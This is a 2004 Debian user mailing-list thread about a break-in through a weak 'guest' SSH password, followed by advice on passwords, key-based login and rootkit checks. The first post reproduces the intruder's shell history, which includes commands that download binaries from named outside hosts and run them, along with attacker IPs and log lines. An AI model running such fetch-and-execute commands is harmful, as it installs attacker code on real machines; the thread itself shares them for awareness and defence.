Re: See what a weak password will get ya?

2004-07-24 Thread John Summerfield
Greg Folkert wrote:
Apparently, the best is to replace crypt based passwords with RSA
based, and use longer passwords.
   

Actually, best actual reasonable password is: to not use one
 

I've noticed that using Debian without a root password requires some work.
I'm comfortable in _my_ circumstances that anyone with physical access 
owns it anyway. Requiring a root password to get to single-user is a 
minor incovenience with several easy ways round it.

Worse, if a filesystemcheck fails and drops you to single-user mode and 
you don't have a root passwd then you're stuffed.


--
Cheers
John
-- spambait
[EMAIL PROTECTED]  [EMAIL PROTECTED]
Tourist pics http://portgeographe.environmentaldisasters.cds.merseine.nu/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-24 Thread Jon Dowland
On Thu, 22 Jul 2004 17:42:53 -0500, Paul Stolp [EMAIL PROTECTED] wrote:

 ./t
 ./h2
 rm -rf h2
 k;./brk

Has anyone grabbed these and checked to see whats inside them?


-- 
Jon Dowland
[EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: cracking - Re: See what a weak password will get ya?

2004-07-23 Thread Alvin Oga

On Thu, 22 Jul 2004, s. keeling wrote:

 Incoming from Alvin Oga:
  
  - and hopefully, they don't have the passwd file from /etc/shadow
  to compare against 
 
 Agreed.  Once they're in, all bets are off. 

best to assume they are already in and sniffing .. 24x7 and work knowing
they can pick up info from their hidden special directory
- if you write a single a into  /tmp/a.txt
the other 511 bytes is available for a secret filesystem
( lots of unused disk space available for hiding
( that regular tools will never find these constantly changing
(  hidden files

 Why bother to crack if you can sniff?

but they and anybody can sniff ???  and yes ... 10x easier to sniff
and maybe even get lucky and get the passwd to all their machines
at work too

- sniff your boxes at the colo ...
( lots of wrong masks being set, to be able to sniff other
( machines - sorta illegal to sniff ??
 
- sniff the wireless connection ...
1/2 the wireless network is not encrypted, so hopefyully,
they are least using ssh for all data transfers
( good for tricking a few people to hang around longer
( to see what they're sniffing on an unencrypted wep traffic

- kimet + ethereal .. see your neighbor's data

c ya
alvin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Karsten M. Self
on Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown ([EMAIL PROTECTED]) wrote:
 Paul Stolp wrote:
 I checked in on some bittorrent progress today at lunch, noticed my
 I'm not sure the July 19 log snippet is related, but seems likely.
 Anyways, I've re-downloaded the files the attacker used and removed (for
 posterity.)
 I changed all passwords, IP Address, I found the evidence at about
 12:24.
 Just wanted to share the need for strong passwords.
 
 I second that recommendation.  I always prefer to have passwords with 
 the following features:
 
 Minimum of 8 characters
 At least 1 capital letter
 At least 1 lower case letter
 At least 1 number
 At least 1 special character
 
 An example of a good password (though since I'm posting it here, it can 
 no longer be considered good) is:
 
 [EMAIL PROTECTED]

My own preference is the 'pwgen' and 'gpw' utilities included in Debian,
combined with either the PalmOS Keyring utility or the vim editing
encrypted files transparently hack documented at:

http://twiki.iwethey.org/Main/IwtNix


Sample pwgen output:

Eive3viequ oos5eigooV aeR0ahwein ooNigh1oos Jui6hailel oMaex1ohve
xah8shoJai Ahnaotach9 Paiphie9ph pah8ahcaeG Uapahph6ik taiYolu4os
aiHahp7jae usheXeec7a Ucei9joong Eteefa6aeg Eethohqu2i neiBaeg4ai
Eiri7eagee Pahceibie8 Yeg0iediev eigiji6Gie Ouduo7pahs ya1weuNapo

And for gpw:

ulingain atailsel stedamen misavisi gasseder uarscroc rismener
rectivac icadoura ishoonce

What may not be immediately apparent is that the generated passwords are
pronounceable in a rough sort of a way.  The generation algorithms are
tunable to greater randomnes or mnemonic qualities.  It's possible to
test quality by generating a known number of passwords, sorting and
generating a uniq list, and counting the resulting lines.  My findings
are that even the relatively mnemonic lists are of very high quality.
Best tests are on 1m or more paswords, but for a relatively short run of
100,000:

$ time gpw 10 10 | sort | uniq | wc -l
99952

real0m9.968s
user0m9.730s
sys 0m0.050s

$ time pwgen 10 10 | sort | uniq | wc -l
99960

real1m1.252s
user0m13.550s
sys 0m45.360s


That's 99.952% and 99.960% uniq, respectively, default settings,
ten-character keys.

The observent reader will note that the length and count arguments are
reversed for these utilities  Remember this as you use them.


For an adult user population, I find that these keys are usually pretty
acceptable.

Working with children, I'm using longer keys by combining a set of
things.  Favorites is a good one, and typical keys run 10-15 characters.
Cryptanalysts will tell you that sticking to dictionary words reduces
the search space markedly, but in balance, it's a good compromise.  With
a user-base extending into the hundreds, only a handful of the youngest
routinely have problems logging in, and I know the keys are not likely
used elsewhere.

Druthers?  I'd echo Greg Folkert's recommendations for key-based
authentication, and use a fob-based password generator plus a PIN.
Something randomly generated, something you have, something you know.
Playing percentages, that's a pretty decent system.

Biometrics?  The shortage of replacement keys, and perverse incentives
to key aquisition (and resultant discomfort) makes me *exceptionally*
wary.  Color me dubious (and leave me my digits and irises).



Peace.

-- 
Karsten M. Self [EMAIL PROTECTED]http://linuxmafia.com/~karsten
Ceterum censeo, Caldera delenda est.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Joost De Cock
Quoting s. keeling [EMAIL PROTECTED]:

 Incoming from Scarletdown:
 
  An example of a good password (though since I'm posting it here, it can
  no longer be considered good) is:
 
  [EMAIL PROTECTED]

 I disagree.  A cracking program is going to attempt to match
 permutations of dictionary words.  This will not add much more time to
 reach the solution.  Better is concatenation of two strings that won't
 match a dictionary pattern:

 b1rDW0rm

What also makes pretty good passwords is shifting your hands around on the
keyboard. Take a simple to remember password (long enough) and then when typing
on the keyboard, don't press the key you need but the on below it to the right
(for example).

slartibartfast becomes:
x.zfgl zfgvzxg

Letters to the right of the keyboard is best since they yield plenty of '\]\'///
stuff :)
Also using shift every other letter or such is good.

Be creative and combine different techniques instead of depending on one. A
friend of mine once was complaining that he couldn't think of a decent password,
so I made him this one:

[EMAIL PROTECTED]

Straight for the ass! (he's a dirty mind)

Passwords are fun ;)

joost


DISCLAIMER
This e-mail and any attached files are confidential and may be legally privileged. If 
you are not the addressee, any disclosure, reproduction, copying, distribution, or 
other dissemination or use of this communication is strictly prohibited. If you have 
received this transmission in error please notify A.S.T.R.I.D.  nv/sa immediately and 
then delete this e-mail.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Karsten M. Self
on Thu, Jul 22, 2004 at 11:02:11PM -0700, Karsten M. Self ([EMAIL PROTECTED]) wrote:
 on Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown ([EMAIL PROTECTED]) wrote:
  Paul Stolp wrote:

  I second that recommendation.  I always prefer to have passwords with 
  the following features:
  
  Minimum of 8 characters

 My own preference is the 'pwgen' and 'gpw' utilities included in Debian,
 combined with either the PalmOS Keyring utility or the vim editing
 encrypted files transparently hack documented at:

...incidentally, this reminded me that I had to do some locking down of
systems here.  I'd managed to goof a Samba config so that the, um,
trivial Linux system password I'd entered at account creation time
wasn't replaced by the Samba password.

I *knew* I had a number of accounts (several score) to fix.  But didn't
know quite which.

Installed 'john' and copied the shadow file to another system.  Found
the accounts in less than five minutes.

'chpasswd' is another slick utility.  Feed it a list of accounts and
passwords (hashed or plaintext) in the form:

user:password

...and it will update in bulk.

To create that file, I simply ran straight from the 'john' output:

for u in $( awk '{gsub([()], , $2); print $2 }'  john.out )
do
echo $u:$( pwgen 20 1 )
done | chpasswd

...which generates a set of 20 character random keys even I don't know.

When the users want access to that system, I'll reset their passwords...
...unless they done been misbehavin', in which case I'll have 'em guess
for a while first ;-)


Peace.

-- 
Karsten M. Self [EMAIL PROTECTED]http://linuxmafia.com/~karsten
Ceterum censeo, Caldera delenda est.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Justinas
On Fri, 23 Jul 2004 00:04:53 -0400
charlie derr [EMAIL PROTECTED] wrote:

 Paul Stolp wrote:
  * dircha [EMAIL PROTECTED] [2004-07-22 21:48]:
  
 Scarletdown wrote:
 
 |  == K
 
  == X
 
 | == P
 
 Anyone else care to add to this little list?
 
 0 == O
 $ == S
 |-| == H
 |_| == U
 |_ == L
 \/\/ == W
 /\/\ == M
 |V| == M
 |\| == N
 |-o-| == tie fighter
 {-o-} == tie interceptor
  
  
  Good plan, I need to improve my ascii art collection.
 
 ^ = V or n //well, sort of :-0
 ! = i
 4 = A
  = G
 3 = E
 5 = S
 + = T
 
 
 i suppose now i ought to look at the rest of the thread too (i didn't 
 notice where it started)
 
   ~c
 
 
 

 d|-_-|b  - stands for DJ

it looks like here we began an IRC chat;] 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Frank Gevaerts
On Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown wrote:
 I second that recommendation.  I always prefer to have passwords with 
 the following features:
 
 Minimum of 8 characters
 At least 1 capital letter
 At least 1 lower case letter
 At least 1 number
 At least 1 special character

Except that in an ideal world where everyone uses random passwords, this
kind of restrictions actually makes the password easier to guess.

Frank

-- 
Debugging is twice as hard as writing the code in the first place.
Therefore, if you write the code as cleverly as possible, you are,
by definition, not smart enough to debug it. - Brian W. Kernighan


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Tim Connors
Frank Gevaerts [EMAIL PROTECTED] said on Fri, 23 Jul 2004 10:44:34 +0200:
 On Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown wrote:
  I second that recommendation.  I always prefer to have passwords with 
  the following features:
  
  Minimum of 8 characters
  At least 1 capital letter
  At least 1 lower case letter
  At least 1 number
  At least 1 special character
 
 Except that in an ideal world where everyone uses random passwords, this
 kind of restrictions actually makes the password easier to guess.

That's precicely what I was thinking.

For each character range of size N that you *must* choose, you
diminish the keyspace by a factor of N/256.

So, if you must have a capital letter, there goes a factor of 26/256 ~
1/10.

If you must have a capital letter or a number, then that's now 36/256.

If you must have an underscore, then you lose a factor of 256. Whoa!

Of course, the 256 in all of the above should really be quite a lot
less (maybe 26+10+10 or so special chars?) because most people don't
enter high ascii and control characters into their passwords - maybe
they should :)

-- 
TimC -- http://astronomy.swin.edu.au/staff/tconnors/
Chairman: I'm glad to see so many bright-eyed and bushy-tailed people
here at this time of the morning.  
From the audience: Actually, most of us are rabid. -- From an astro talk


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Paul Stolp
* Monique Y. Mudama [EMAIL PROTECTED] [2004-07-23 00:04]:

 I'd add the suggestion to not use obvious usernames like guest ... 

agree -- I will prob. replace this account name

 
 Btw, are you 100% sure they never managed to root you and replace some
 of your files?

I wasn't 100% sure I wasn't cracked when I installed, but I am sure that
my core utilities are the same as before this attempt. This and clean
chkrootkit are enough for me, as long as I continue to watch what's
going on.

Thanks everyone, mostly I was just venting, but hopefully this will help
prompt anyone who knows of a potential system weakness.

Paul
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Awais Ahmad
Hi,

I haven't caught the start of this thread, but how can you be sure your
core utilities have not been altered?

Do have a record of how they looked before the crack (a backup, MD5 sums
etc, AIDE,Tripwire database)?. IMO, you would really need to examine
those binaries on another box against a known equivalent clean copy or
backup/AIDE/Tripwire database before really being sure.


Awais


On Fri, 2004-07-23 at 12:23, Paul Stolp wrote:
 * Monique Y. Mudama [EMAIL PROTECTED] [2004-07-23 00:04]:
 
  I'd add the suggestion to not use obvious usernames like guest ... 
 
 agree -- I will prob. replace this account name
 
  
  Btw, are you 100% sure they never managed to root you and replace some
  of your files?
 
 I wasn't 100% sure I wasn't cracked when I installed, but I am sure that
 my core utilities are the same as before this attempt. This and clean
 chkrootkit are enough for me, as long as I continue to watch what's
 going on.
 
 Thanks everyone, mostly I was just venting, but hopefully this will help
 prompt anyone who knows of a potential system weakness.
 
 Paul
 -- 
 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-23 Thread Kirk Strauser
On Thursday 22 July 2004 17:42, Paul Stolp wrote:

 See what a weak password will get ya?

No.  I do, however, see what allowing password logins to an SSH server will 
get you.  I could set my password to foo and you still aren't getting in 
without my RSA key (or Kerberos ticket).

Oh, and disable root logins while you're at it if you haven't already.
-- 
Kirk Strauser


pgpO1AqXYGwe2.pgp
Description: signature


See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
I checked in on some bittorrent progress today at lunch, noticed my
process monitor showing full activity. Ran top, saw user guest logged
on, running 4 instances of a program named t, and short term load
average over 4. AAGGGHHH!
shutdown -h now  !
pull network cable
reboot
look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
on security and running 2.6.7.
changed all passwords to much stronger
Anyhow, I figure turnabout is fair play, so, here's the bash history
from the guest user account, along with the IP addresses the attacker
logged in from:

w
uname -a
wc -l /etc/passwd
wget smenlove.home.ro/t.gz ;tar xzvf t.gz ;  rm -rf t.gz ; ./t
./t
./t
./t
./t
./t
ls
rm -rf t
kill -9 
%1
kill -9 %1
wget smenlove.home.ro/h.tgz ; tar xzvf h.tgz ; rm -rf h.tgz ; ./h2
w
id
./h2 
rm -rf h2 
wget
vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2
-d brk.bz2;chmod +x br
k;./brk
wget
vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2
-d brk.bz2;chmod +x br
k;./brk
ls
passwd
exit


Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 131.234.157.10
Jul 19 19:54:41 greta sshd[7071]: error: Could not get shadow
information for NO
USER
Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin
from 13
1.234.157.10 port 35860 ssh2
Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 131.234.157.10
Jul 19 19:54:44 greta sshd[7073]: error: Could not get shadow
information for NO
USER
Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin
from 13
1.234.157.10 port 35917 ssh2
Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 131.234.157.10

Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test
from 15
6.17.99.11 port 37183 ssh2
Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from
156.17.99.11
 port 37228 ssh2
 Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user
 guest by (
 uid=0)
 Jul 22 10:24:47 greta sshd[22407]: (pam_unix) session closed for user
 guest

Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from
80.110.102.105 port 3938 ssh2
Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user
guest by (uid=0)
Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure;
logname=guest uid=1002 euid=0 tty= ruser=
 rhost=  user=guest
 Jul 22 12:13:16 greta sshd[22597]: (pam_unix) session closed for user
 guest

I'm not sure the July 19 log snippet is related, but seems likely.
Anyways, I've re-downloaded the files the attacker used and removed (for
posterity.)
I changed all passwords, IP Address, I found the evidence at about
12:24.
Just wanted to share the need for strong passwords.
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread Scarletdown
Paul Stolp wrote:
I checked in on some bittorrent progress today at lunch, noticed my
I'm not sure the July 19 log snippet is related, but seems likely.
Anyways, I've re-downloaded the files the attacker used and removed (for
posterity.)
I changed all passwords, IP Address, I found the evidence at about
12:24.
Just wanted to share the need for strong passwords.
I second that recommendation.  I always prefer to have passwords with 
the following features:

Minimum of 8 characters
At least 1 capital letter
At least 1 lower case letter
At least 1 number
At least 1 special character
An example of a good password (though since I'm posting it here, it can 
no longer be considered good) is:

[EMAIL PROTECTED]
Meets all the above specifications, plus is readable.  Combining special 
characters to make letters also helps.  Though at the moment, I can only 
think of 3 combinations...

|  == K
 == X
| == P
Anyone else care to add to this little list?
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread dircha
Scarletdown wrote:
|  == K
  == X
| == P
Anyone else care to add to this little list?
0 == O
$ == S
|-| == H
|_| == U
|_ == L
\/\/ == W
/\/\ == M
|V| == M
|\| == N
|-o-| == tie fighter
{-o-} == tie interceptor
8~~
?
8-)
...
!
--dircha
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



OT: Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Paul Stolp:
 I checked in on some bittorrent progress today at lunch, noticed my
 process monitor showing full activity. Ran top, saw user guest logged
 on, running 4 instances of a program named t, and short term load
 average over 4. AAGGGHHH!
 shutdown -h now  !
 pull network cable
 reboot
 look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
...

How did you manage to verify that?  Are you running chkrootkit?
tripwire?  Something else?

(0) keeling /home/keeling_ host smenlove.home.ro
smenlove.home.roA   81.196.20.133

(0) keeling /home/keeling_ ripe 81.196.20.133
inetnum:  81.196.20.128 - 81.196.20.159
netname:  RO-RDS-HOME-RO
descr:Home.RO / Go.RO
country:  RO
admin-c:  HAD6-RIPE
tech-c:   HAD6-RIPE
status:   ASSIGNED PA
remarks:  INFRA-AW
remarks:  +---+
remarks:  | ABUSE CONTACT: [EMAIL PROTECTED] IN CASE OF HACK ATTACKS, |
remarks:  | ILLEGAL ACTIVITY, VIOLATION, SCANS, PROBES, SPAM, ETC.|
remarks:  +---+
...

(0) keeling /home/keeling_ ripe 131.234.157.10
inetnum:  131.234.0.0 - 131.234.255.255
netname:  UNIPADERBORN
descr:Universitaet Paderborn
country:  DE
...

(0) keeling /home/keeling_ host 80.110.102.105
Name: chello080110102105.508.15.vie.surfer.at
Address: 80.110.102.105

(0) keeling /home/keeling_ ripe 80.110.102.105
inetnum:  80.110.48.0 - 80.110.118.255
netname:  VIE-15-CUSTOMER-LANCITY
descr:chello Austria
descr:Lancity Customers in Vienna, Headend 15
country:  AT
admin-c:  HMCB1-RIPE
tech-c:   HMCB1-RIPE
status:   ASSIGNED PA
remarks:  Contact [EMAIL PROTECTED] concerning criminal
remarks:  activities like spam, hacks, portscans

 Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from
 156.17.99.11
  port 37228 ssh2
  Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user
  guest by (
  uid=0)
...^

 Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from
 80.110.102.105 port 3938 ssh2
 Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user
 guest by (uid=0)
 Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure;
 logname=guest uid=1002 euid=0 tty= ruser=
.^^


 Just wanted to share the need for strong passwords.

Not to mention backups and fresh installation media?


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Scarletdown:
 
 An example of a good password (though since I'm posting it here, it can 
 no longer be considered good) is:
 
 [EMAIL PROTECTED]

I disagree.  A cracking program is going to attempt to match
permutations of dictionary words.  This will not add much more time to
reach the solution.  Better is concatenation of two strings that won't
match a dictionary pattern:

b1rDW0rm

 |  == K
  == X
 | == P
 
 Anyone else care to add to this little list?

Hadn't thought of those.  Cute.

Apparently, the best is to replace crypt based passwords with RSA
based, and use longer passwords.


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread Chris Metzler
On Thu, 22 Jul 2004 17:42:53 -0500
Paul Stolp [EMAIL PROTECTED] wrote:

 I checked in on some bittorrent progress today at lunch, noticed my
 process monitor showing full activity. Ran top, saw user guest logged
 on, running 4 instances of a program named t, and short term load
 average over 4. AAGGGHHH!
 shutdown -h now  !

Believe it or not, this is often a bad idea.  It's often easier to
determine the scope of a compromise by watching the intrude for a little
while than to attempt to find out afterwards with forensics.


 pull network cable
 reboot
 look for damage, whew, I was O.K.

How did you determine this?

-c

-- 
Chris Metzler   [EMAIL PROTECTED]
(remove snip-me. to email)

As a child I understood how to give; I have forgotten this grace since I
have become civilized. - Chief Luther Standing Bear


pgpQjMBW1NFKJ.pgp
Description: PGP signature


Re: See what a weak password will get ya?

2004-07-22 Thread Mathieu Ducharme
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On July 22, 2004 10:59 pm, s. keeling wrote:
 Incoming from Scarletdown:
  An example of a good password (though since I'm posting it here, it can
  no longer be considered good) is:
 
  [EMAIL PROTECTED]

 I disagree.  A cracking program is going to attempt to match
 permutations of dictionary words.  This will not add much more time to
 reach the solution.  Better is concatenation of two strings that won't
 match a dictionary pattern:

 b1rDW0rm


I'm pretty sure dictionary attack also look for this. (?)

Use other characters that will make the word absolutely not dictionar- related

x[([EMAIL PROTECTED])~(w0rD)]x

Still as easy to remember (longer to type though)

  |  == K
  |
   == X
  
  | == P
 
  Anyone else care to add to this little list?

 Hadn't thought of those.  Cute.

 Apparently, the best is to replace crypt based passwords with RSA
 based, and use longer passwords.


 --
 Any technology distinguishable from magic is insufficiently advanced.
 (*)   http://www.spots.ab.ca/~keeling
 - -

- -- 
Mathieu Ducharme
[EMAIL PROTECTED]
Use GPG to avoid spam trap
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBAIcingfWgVs5hW0RAj20AKDJrhzVJg6isKeIAia/iEaGC3NeHQCgpBkf
Yh5JlhDFcg1fCEBwrpaKmvY=
=+Wfi
-END PGP SIGNATURE-



Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Mathieu Ducharme:
 On July 22, 2004 10:59 pm, s. keeling wrote:
  Incoming from Scarletdown:
   An example of a good password (though since I'm posting it here, it can
   no longer be considered good) is:
  
   [EMAIL PROTECTED]
 
  I disagree.  A cracking program is going to attempt to match
  permutations of dictionary words.  This will not add much more time to
 
  b1rDW0rm
 
 I'm pretty sure dictionary attack also look for this. (?)

It was just an example.  I sprinkle liberally with punctuation.  :-)

 Use other characters that will make the word absolutely not dictionary related
 
 x[([EMAIL PROTECTED])~(w0rD)]x

However, if you haven't moved to RSA based longer passwords, that's
effectively x[([EMAIL PROTECTED]) (which isn't bad, but you may be typing more than
is recognized).  Stock passwords are eight chars.  The rest are ignored.


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
* dircha [EMAIL PROTECTED] [2004-07-22 21:48]:
 Scarletdown wrote:
 |  == K
   == X
 | == P
 
 Anyone else care to add to this little list?
 
 0 == O
 $ == S
 |-| == H
 |_| == U
 |_ == L
 \/\/ == W
 /\/\ == M
 |V| == M
 |\| == N
 |-o-| == tie fighter
 {-o-} == tie interceptor

Good plan, I need to improve my ascii art collection.
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: OT: Re: See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
* s. keeling [EMAIL PROTECTED] [2004-07-22 22:03]:
 Incoming from Paul Stolp:
  I checked in on some bittorrent progress today at lunch, noticed my
  process monitor showing full activity. Ran top, saw user guest logged
  on, running 4 instances of a program named t, and short term load
  average over 4. AAGGGHHH!
  shutdown -h now  !
  pull network cable
  reboot
  look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
 ...
 
 How did you manage to verify that?  Are you running chkrootkit?
 tripwire?  Something else?

chkrootkit, plus verification of md5sums of certain binaries.

 
 (0) keeling /home/keeling_ host smenlove.home.ro
 smenlove.home.roA   81.196.20.133
 
 (0) keeling /home/keeling_ ripe 81.196.20.133
 inetnum:  81.196.20.128 - 81.196.20.159
 netname:  RO-RDS-HOME-RO
 descr:Home.RO / Go.RO
 country:  RO
 admin-c:  HAD6-RIPE
 tech-c:   HAD6-RIPE
 status:   ASSIGNED PA
 remarks:  INFRA-AW
 remarks:  +---+
 remarks:  | ABUSE CONTACT: [EMAIL PROTECTED] IN CASE OF HACK ATTACKS, |
 remarks:  | ILLEGAL ACTIVITY, VIOLATION, SCANS, PROBES, SPAM, ETC.|
 remarks:  +---+
 ...
 

Reported.

 
  Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from
  156.17.99.11
   port 37228 ssh2
   Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user
   guest by (
   uid=0)
 ...^
 
maybe I'm missing something, but isn't that how sshd works? That's what
I get logging in from my usual account...

  Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from
  80.110.102.105 port 3938 ssh2
  Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user
  guest by (uid=0)
  Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure;
   ^^^
  logname=guest uid=1002 euid=0 tty= ruser=
 .^^
 
 
  Just wanted to share the need for strong passwords.
 
 Not to mention backups and fresh installation media?
 

You better believe it!
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
* Chris Metzler [EMAIL PROTECTED] [2004-07-22 22:18]:
 On Thu, 22 Jul 2004 17:42:53 -0500
 Paul Stolp [EMAIL PROTECTED] wrote:
 
  shutdown -h now  !
 
 Believe it or not, this is often a bad idea.  It's often easier to
 determine the scope of a compromise by watching the intrude for a little
 while than to attempt to find out afterwards with forensics.

I thought this afterwards, but it appears the attacker went away empty
handed anyways. He was already logged out when I noticed the high load.
He tried to kill the t program, but couldn't. I suspect he was
somewhat inept (as was I with the pathetic password I assigned to the
guest account!) in reviewing the logs and bash history, it becomes
fairly easy to piece together.

I will definitely consider your advice when I'm in this situation again.

 
  look for damage, whew, I was O.K.
 
 How did you determine this?

chkrootkit and, more satisfying to me, md5sums of some key binaries.

Thanks,
Paul
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread charlie derr
Paul Stolp wrote:
* dircha [EMAIL PROTECTED] [2004-07-22 21:48]:
Scarletdown wrote:
|  == K
 == X
| == P
Anyone else care to add to this little list?
0 == O
$ == S
|-| == H
|_| == U
|_ == L
\/\/ == W
/\/\ == M
|V| == M
|\| == N
|-o-| == tie fighter
{-o-} == tie interceptor

Good plan, I need to improve my ascii art collection.
^ = V or n //well, sort of :-0
! = i
4 = A
 = G
3 = E
5 = S
+ = T
i suppose now i ought to look at the rest of the thread too (i didn't 
notice where it started)

~c



signature.asc
Description: OpenPGP digital signature


Re: OT: Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Paul Stolp:
 * s. keeling [EMAIL PROTECTED] [2004-07-22 22:03]:
  Incoming from Paul Stolp:
   look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
  ...
  
  How did you manage to verify that?  Are you running chkrootkit?
  tripwire?  Something else?
 
 chkrootkit, plus verification of md5sums of certain binaries.

Good luck.  You're drivin'.  Me?  I'd at least take it off-line and
burn a CD.  Then you can have something to compare it to if anything
starts to look wonky in the future.


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread Greg Folkert
On Thu, 2004-07-22 at 22:59, s. keeling wrote:
 Incoming from Scarletdown:
  
  An example of a good password (though since I'm posting it here, it can 
  no longer be considered good) is:
  
  [EMAIL PROTECTED]
 
 I disagree.  A cracking program is going to attempt to match
 permutations of dictionary words.  This will not add much more time to
 reach the solution.  Better is concatenation of two strings that won't
 match a dictionary pattern:
 
 b1rDW0rm
 
  |  == K
   == X
  | == P
  
  Anyone else care to add to this little list?
 
 Hadn't thought of those.  Cute.
 
 Apparently, the best is to replace crypt based passwords with RSA
 based, and use longer passwords.

Actually, best actual reasonable password is: to not use one

Use key-based authentication. Personally, I use 2048bit keys for machine
that are considered core/valuable.

Play machines... only get 1024bit. I have a master private key, with
everything being generated as subkeys from that. Yeap, the passphrase
